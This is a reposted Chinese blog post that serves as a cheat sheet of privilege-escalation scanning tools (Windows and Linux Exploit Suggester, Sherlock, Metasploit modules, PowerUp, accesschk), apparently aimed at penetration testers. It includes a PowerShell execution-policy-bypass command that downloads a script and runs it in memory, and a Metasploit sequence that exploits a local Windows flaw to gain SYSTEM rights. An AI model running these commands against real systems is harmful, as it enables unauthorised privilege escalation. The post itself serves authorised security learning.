干货|提权扫描工具一览
2023-3-25 11:0:16 Author: 黑白之道(查看原文) 阅读量:20 收藏

使用Windows-Exploit-Suggester解析systeminfo

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

./windows-exploit-suggester.py

使用Linux-Exploit-Suggester.sh寻找linux提权问题

https://github.com/mzet-/linux-exploit-suggester

./linux-exploit-suggester.sh

使用Sherlock

https://github.com/rasta-mouse/Sherlock

Import-Module Sherlock.ps1Find-AllVulns

使用msf查询补丁和可利用提权漏洞

# 查询补丁meterpreter> run post/windows/gather/enum_patches [+] KB2999226 installed on 11/25/2020[+] KB976902 installed on 11/21/2010
# 查询Expmsf> use post/multi/recon/local_exploit_suggester msf> set LHOST <攻击机IP>msf> set SESSION <session_id>msf> run
# 利用示例msf> use exploit/windows/local/cve_2019_1458_wizardopium msf> set SESSION <session_id>msf> runmeterpreter> getuidServer username: NT AUTHORITY\SYSTEM

使用powerup检查提权漏洞

powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"powershell.exe -nop -exec bypass -c "IEX (New-object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"

使用accesschk.exe对系统扫描发现高权限可执行程序,且能够被低权限用户更改

accesschk "d:\dir"查看所有用户在d盘dir路径的子路径的权限
accesschk "Administrator "d:\dir"查看Administrator用户在d盘dir路径的子路径的权限
accesschk Administrators -c *查看Administrators组对所有服务的权限
accesschk -k Guest hklm\software查看Guest用户对hklm\software注册表的权限
accesschk -ou User查看User用户对全局对象的权限

文章来源:转自Leticia's Blog

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文

END

多一个点在看多一条小鱼干


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650566440&idx=4&sn=47a19c156041fe5d983019df3ff9208d&chksm=83bd0accb4ca83daf2fac25757a817f489d0316d7465e8a6755a6d9e4737b0c90040d567ca58#rd
如有侵权请联系:admin#unsafe.sh